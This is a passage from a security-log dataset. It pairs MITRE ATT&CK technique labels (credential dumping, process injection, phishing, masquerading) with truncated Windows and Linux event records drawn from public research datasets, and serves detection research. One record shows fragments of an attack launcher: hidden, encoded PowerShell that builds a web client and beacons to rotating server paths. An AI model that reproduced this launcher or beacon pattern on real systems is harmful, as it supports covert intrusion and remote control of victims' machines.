SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivil || 10. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Delegation New Logon: Security ID: S-1-5-21-3669966080-2286457517-972388166-1104 Account Name: pgustavo Account Domain: THESHIRE.LOCAL Logon ID: 0xCD87B2 Linked Log || 11. A handle to an object was requested. Subject: Security ID: S-1-5-21-3669966080-2286457517-972388166-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0xCD87B2 Object: Object Server: SC Manager Object Type: SERVICE OBJECT Object Name: IKEEXT Handle ID: 0x1781461e7b0 Resource Attributes: - Process Information: Process ID: 0x2b8 Process Name: C:\Windows\System32\services.exe Access Reque || 12. The handle to an object was closed. Subject : Security ID: S-1-5-21-3669966080-2286457517-972388166-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0xCD87B2 Object: Object Server: SC Manager Handle ID: 0x1781461e7b0 Process Information: Process ID: 0x2b8 Process Name: C:\Windows\System32\services.exe
46
Linux-APT-Dataset-2024
linux
21
6
Defense Evasion
T1222.002
2024-01-07T08:54:15.418000+03:00
2024-01-07T08:54:32.394000+03:00
1. sudo || 2. sudo || 3. ls || 4. sudo || 5. sudo || 6. ls
47
OTRF-Security-Datasets-compound
windows
ACCT01.pandalab.com
12
Credential Access
T1003.001
2023-08-15T08:33:51.740000+03:00
2023-08-15T08:47:21.635000+03:00
1. CommandInvocation(Get-Date): "Get-Date" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = ff044c8a-18a8-4d52-b810-60b111bbabaa Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = ee9b3ba9-4509-4a7b-a9b7-5b5f05254d78 Pipeline ID = 67 Command Name = Get-Date Comm || 2. CommandInvocation(Collection-Start.ps1): "Collection-Start.ps1" CommandInvocation(Out-Default): "Out-Default" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = ff044c8a-18a8-4d52-b810-60b111bbabaa Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = ee9b3ba9-450 || 3. prompt || 4. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 00:33:53.552 ProcessGuid: {19de6d3b-7bd6-64da-2b00-000000000c00} ProcessId: 1748 Image: C:\Windows\System32\svchost.exe Device: \Device\HarddiskVolume2 User: NT AUTHORITY\SYSTEM || 5. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2023-08-16 00:33:53.849 ProcessGuid: {19de6d3b-a606-64da-2800-000000000c00} ProcessId: 1620 PipeName: \VBoxTrayIPC-nora.quemona Image: C:\Windows\System32\VBoxService.exe User: NT AUTHORITY\SYSTEM || 6. RawAccessRead detected: RuleName: - UtcTime: 2023-08-16 00:33:54.101 ProcessGuid: {19de6d3b-196c-64dc-0e0c-000000000c00} ProcessId: 276 Image: C:\Windows\System32\SearchIndexer.exe Device: \Device\Harddisk0\DR0 User: NT AUTHORITY\SYSTEM || 7. A process has exited. Subject: Security ID: S-1-5-21-1939123204-1418869057-2368897034-1108 Account Name: nora.quemona Account Domain: PANDALAB Logon ID: 0x1A274E4 Process Information: Process ID: 0x1b20 Process Name: C:\Windows\System32\dllhost.exe Exit Status: 0x0 || 8. "C:\Windows\system32\wermgr.exe" "-outproc" "0" "276" "1412" "1348" "1416" "0" "0" "1420" "0" "0" "0" "0" "0" || 9. "C:\Windows\system32\wermgr.exe" "-outproc" "0" "276" "1412" "1348" "1416" "0" "0" "1420" "0" "0" "0" "0" "0" || 10. File created: RuleName: - UtcTime: 2023-08-16 00:33:54.518 ProcessGuid: {19de6d3b-1972-64dc-0f0c-000000000c00} ProcessId: 6224 Image: C:\Windows\system32\wermgr.exe TargetFilename: C:\ProgramData\Microsoft\Windows\WER\Temp\e8764875-4282-4e87-8bcd-d4228dab483d CreationUtcTime: 2023-08-16 00:33:54.518 User: NT AUTHORITY\SYSTEM || 11. File created: RuleName: - UtcTime: 2023-08-16 00:33:54.518 ProcessGuid: {19de6d3b-1972-64dc-0f0c-000000000c00} ProcessId: 6224 Image: C:\Windows\system32\wermgr.exe TargetFilename: C:\ProgramData\Microsoft\Windows\WER\Temp\a00bd4b0-f2e5-479b-9c9f-36cea7be29e3 CreationUtcTime: 2023-08-16 00:33:54.518 User: NT AUTHORITY\SYSTEM || 12. File created: RuleName: - UtcTime: 2023-08-16 00:33:54.639 ProcessGuid: {19de6d3b-1972-64dc-0f0c-000000000c00} ProcessId: 6224 Image: C:\Windows\system32\wermgr.exe TargetFilename: C:\ProgramData\Microsoft\Windows\WER\Temp\84c5dae2-36f9-43d3-8145-46b9eb0b3f0a CreationUtcTime: 2023-08-16 00:33:54.639 User: NT AUTHORITY\SYSTEM
48
BRAWL-Dataset
windows
colgan-pc
12
Execution
T1059.001
2017-05-01T21:58:37.548000+03:00
2017-05-01T23:21:39.366000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
49
OTRF-Security-Datasets-atomic
windows
DC01.pandalab.com
12
Credential Access
T1003.003
2023-07-19T08:32:49.043000+03:00
2023-07-19T12:06:15.730000+03:00
1. CommandInvocation(Get-Date): "Get-Date" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.20348.1366 Host ID = a4c2a31b-a210-4628-a20a-e28e43766d23 Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.20348.1366 Runspace ID = d3b54c88-e2ec-46f7-adbf-e7923c10ba46 Pipeline ID = 16 Command Name = Get-Date Comm || 2. CommandInvocation(Collection-Start.ps1): "Collection-Start.ps1" CommandInvocation(Out-Default): "Out-Default" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.20348.1366 Host ID = a4c2a31b-a210-4628-a20a-e28e43766d23 Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.20348.1366 Runspace ID = d3b54c88-e2e || 3. prompt || 4. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2023-07-20 00:32:51.929 ProcessGuid: {fe86be69-25d2-64b6-2000-000000001000} ProcessId: 1244 PipeName: \VBoxTrayIPC-Administrator Image: C:\Windows\System32\VBoxService.exe User: NT AUTHORITY\SYSTEM || 5. The handle to an object was closed. Subject : Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Handle ID: 0x23a4 Process Information: Process ID: 0x828 Process Name: C:\Windows\explorer.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Object Type: File Object Name: C:\Windows\WinSxS\FileMaps\_0000000000000000.cdf-ms Handle ID: 0x2064 Resource Attributes: - Process Information: Process ID: 0x828 Process Name: C:\Windows\explo || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Handle ID: 0x2064 Process Information: Process ID: 0x828 Process Name: C:\Windows\explorer.exe || 8. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2023-07-20 00:32:56.992 ProcessGuid: {fe86be69-25d2-64b6-2000-000000001000} ProcessId: 1244 PipeName: \VBoxTrayIPC-Administrator Image: C:\Windows\System32\VBoxService.exe User: NT AUTHORITY\SYSTEM || 9. The handle to an object was closed. Subject : Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Account Manager Handle ID: 0x285430f8240 Process Information: Process ID: 0x258 Process Name: C:\Windows\System32\lsass.exe || 10. The handle to an object was closed. Subject : Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Account Manager Handle ID: 0x285430f6440 Process Information: Process ID: 0x258 Process Name: C:\Windows\System32\lsass.exe || 11. The handle to an object was closed. Subject : Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Account Manager Handle ID: 0x285430f7d40 Process Information: Process ID: 0x258 Process Name: C:\Windows\System32\lsass.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-21-477444970-2264162048-1418806404-500 Account Name: Administrator Account Domain: PANDALAB Logon ID: 0x627B7 Object: Object Server: Security Account Manager Handle ID: 0x285430f7d40 Process Information: Process ID: 0x258 Process Name: C:\Windows\System32\lsass.exe
50
Linux-APT-Dataset-2024
linux
21
6
Credential Access
T1040
2024-01-07T08:56:34.530000+03:00
2024-01-07T08:56:45.694000+03:00
1. sudo || 2. timeout || 3. timeout || 4. sudo || 5. ssh || 6. cat
51
OTRF-Security-Datasets-compound
windows
PRD01.pandalab.com
12
Credential Access
T1003.001
2023-08-18T11:56:04.312000+03:00
2023-08-18T12:10:24.444000+03:00
1. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 5d062b17-be10-4022-b043-709d348a4f4b Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 2. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Diagnostics.Eventing.Reader.EventLogSession" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 5d062b17-be10-4022-b043-709d348a4f4b Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5 || 3. CommandInvocation(Get-Date): "Get-Date" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 5d062b17-be10-4022-b043-709d348a4f4b Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = 68de2889-c562-4751-90f4-f89b25880066 Pipeline ID = 62 Command Name = Get-Date Comm || 4. CommandInvocation(Collection-Start.ps1): "Collection-Start.ps1" CommandInvocation(Out-Default): "Out-Default" Context: Severity = Informational Host Name = Windows PowerShell ISE Host Host Version = 5.1.19041.1682 Host ID = 5d062b17-be10-4022-b043-709d348a4f4b Host Application = C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe Engine Version = 5.1.19041.1682 Runspace ID = 68de2889-c56 || 5. prompt || 6. Network connection detected: RuleName: - UtcTime: 2023-08-18 04:21:47.200 ProcessGuid: {57be2c82-4f79-64de-eb03-000000000000} ProcessId: 4 Image: System User: NT AUTHORITY\SYSTEM Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 192.168.1.42 SourceHostname: - SourcePort: 49604 SourcePortName: - DestinationIsIpv6: false DestinationIp: 192.168.1.4 DestinationHostname: - DestinationPort: 44 || 7. RawAccessRead detected: RuleName: - UtcTime: 2023-08-18 15:56:04.789 ProcessGuid: {57be2c82-2583-64de-2600-000000000600} ProcessId: 1496 Image: C:\Windows\System32\svchost.exe Device: \Device\HarddiskVolume2 User: NT AUTHORITY\SYSTEM || 8. Pipe Connected: RuleName: - EventType: ConnectPipe UtcTime: 2023-08-18 15:56:06.036 ProcessGuid: {57be2c82-4fb2-64de-2000-000000000600} ProcessId: 1232 PipeName: \VBoxTrayIPC-pupy.godoy Image: C:\Windows\System32\VBoxService.exe User: NT AUTHORITY\SYSTEM || 9. "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default || 10. "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default || 11. A handle to an object was requested. Subject: Security ID: S-1-5-21-1939123204-1418869057-2368897034-1107 Account Name: pupy.godoy Account Domain: PANDALAB Logon ID: 0x20810B Object: Object Server: Security Object Type: File Object Name: C:\Windows\WinSxS\FileMaps\_0000000000000000.cdf-ms Handle ID: 0x24d4 Resource Attributes: - Process Information: Process ID: 0x13a0 Process Name: C:\Windows\expl || 12. RawAccessRead detected: RuleName: - UtcTime: 2023-08-18 15:56:06.153 ProcessGuid: {57be2c82-4f79-64de-eb03-000000000000} ProcessId: 4 Image: System Device: \Device\HarddiskVolume3 User: NT AUTHORITY\SYSTEM
52
BRAWL-Dataset
windows
ostermeyer-pc
12
Execution
T1059.001
2017-05-01T21:59:04.724000+03:00
2017-05-01T23:22:09.132000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 5. "powershell" -command - || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 12. c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass "C:\Progra~1\SplunkUniversalForwarder\etc\apps\fmx_computer_properties\bin\unified_json.ps1"
53
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Privilege Escalation
T1055.003
2020-08-07T21:32:07.556000+03:00
2020-08-07T21:33:58.106000+03:00
1. CommandInvocation(Start-Sleep): "Start-Sleep" ParameterBinding(Start-Sleep): name="Seconds"; value="5" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAHIAcw || 2. CommandInvocation(Get-Random): "Get-Random" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAHIAcwBpAE8ATgAuAE0AYQBKAE8AcgAgAC0AZwBFACAAMwApAHsAJAA5ADMAOQA9A || 3. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Net.WebClient" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAYgBsAEUAL || 4. CommandInvocation(ForEach-Object): "ForEach-Object" ParameterBinding(ForEach-Object): name="Process"; value="$55f.Headers.Add($_.Name, $_.Value)" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFI || 5. CommandInvocation(Get-Random): "Get-Random" ParameterBinding(Get-Random): name="InputObject"; value="/admin/get.php" ParameterBinding(Get-Random): name="InputObject"; value="/news.php" ParameterBinding(Get-Random): name="InputObject"; value="/login/process.php" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host || 6. Network connection detected: RuleName: - UtcTime: 2020-08-07 18:32:07.339 ProcessGuid: {297bc33e-9de2-5f2d-2208-000000000400} ProcessId: 6008 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: THESHIRE\pgustavo Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 172.18.39.5 SourceHostname: - SourcePort: 63732 SourcePortName: - DestinationIsIpv6: false DestinationIp: 10. || 7. CommandInvocation(Start-Sleep): "Start-Sleep" ParameterBinding(Start-Sleep): name="Seconds"; value="5" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAHIAcw || 8. CommandInvocation(Get-Random): "Get-Random" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAHIAcwBpAE8ATgAuAE0AYQBKAE8AcgAgAC0AZwBFACAAMwApAHsAJAA5ADMAOQA9A || 9. CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="System.Net.WebClient" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAYgBsAEUAL || 10. CommandInvocation(ForEach-Object): "ForEach-Object" ParameterBinding(ForEach-Object): name="Process"; value="$55f.Headers.Add($_.Name, $_.Value)" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host Application = C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFI || 11. CommandInvocation(Get-Random): "Get-Random" ParameterBinding(Get-Random): name="InputObject"; value="/admin/get.php" ParameterBinding(Get-Random): name="InputObject"; value="/news.php" ParameterBinding(Get-Random): name="InputObject"; value="/login/process.php" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.752 Host ID = 9076be06-2327-4eed-a6b0-8f133a00866c Host || 12. Network connection detected: RuleName: - UtcTime: 2020-08-07 18:32:12.441 ProcessGuid: {297bc33e-9de2-5f2d-2208-000000000400} ProcessId: 6008 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: THESHIRE\pgustavo Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 172.18.39.5 SourceHostname: - SourcePort: 63733 SourcePortName: - DestinationIsIpv6: false DestinationIp: 10.
54
Linux-APT-Dataset-2024
linux
21
4
Defense Evasion
T1036.005
2024-01-07T08:39:09.219000+03:00
2024-01-07T08:55:16.490000+03:00
1. crontab || 2. cp || 3. cp || 4. crontab
55
OTRF-Security-Datasets-compound
windows
NASHUA.dmevals.local
12
Initial Access
T1566
2020-05-02T05:55:30.540000+03:00
2020-05-02T11:16:31.709000+03:00
1. File created: RuleName: - UtcTime: 2020-05-02 02:55:28.893 ProcessGuid: {5aa8ec29-cada-5eac-2700-000000000400} ProcessId: 1560 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-05-02 01:21:27.463 || 2. Network connection detected: RuleName: - UtcTime: 2020-05-02 02:56:11.102 ProcessGuid: {5aa8ec29-cad9-5eac-1e00-000000000400} ProcessId: 1348 Image: C:\Windows\System32\svchost.exe User: NT AUTHORITY\NETWORK SERVICE Protocol: udp Initiated: true SourceIsIpv6: false SourceIp: 10.0.1.6 SourceHostname: - SourcePort: 63889 SourcePortName: - DestinationIsIpv6: false DestinationIp: 10.0.0.4 DestinationH || 3. File created: RuleName: - UtcTime: 2020-05-02 02:56:28.892 ProcessGuid: {5aa8ec29-cada-5eac-2700-000000000400} ProcessId: 1560 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-05-02 01:20:27.460 || 4. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4d0 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 5. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4d0 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request In || 6. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x6f8 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x6f8 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request In || 8. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x654 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 9. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x654 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request In || 10. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x5dc Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 11. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x5dc Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request In || 12. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4d0 Resource Attributes: - Process Information: Process ID: 0x734 Process Name: C:\Windows\System32\svchost.exe Access Request Inform
56
BRAWL-Dataset
windows
harley-pc
12
Execution
T1059.001
2017-05-01T21:59:04.425000+03:00
2017-05-01T23:21:06.127000+03:00
1. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 2. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 3. c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass "C:\Progra~1\SplunkUniversalForwarder\etc\apps\fmx_computer_properties\bin\unified_json.ps1" || 4. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 5. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 6. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 7. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 10. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 11. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 12. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
57
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Discovery
T1049
2020-09-22T10:45:16.450000+03:00
2020-09-22T10:46:27.585000+03:00
1. C:\windows\system32\wbem\wmiprvse.exe -Embedding || 2. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x1e10 Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x74 Resource Attributes: - Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Informat || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x74 Resource Attributes: - Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Info || 5. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x74 Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 6. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x14fc Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 7. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0x348 Resource Attributes: - Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Informa || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x348 Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 9. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x14fc Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0x380 Resource Attributes: - Process Information: Process ID: 0x1594 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Informa || 11. The handle to an object was closed. Subject : 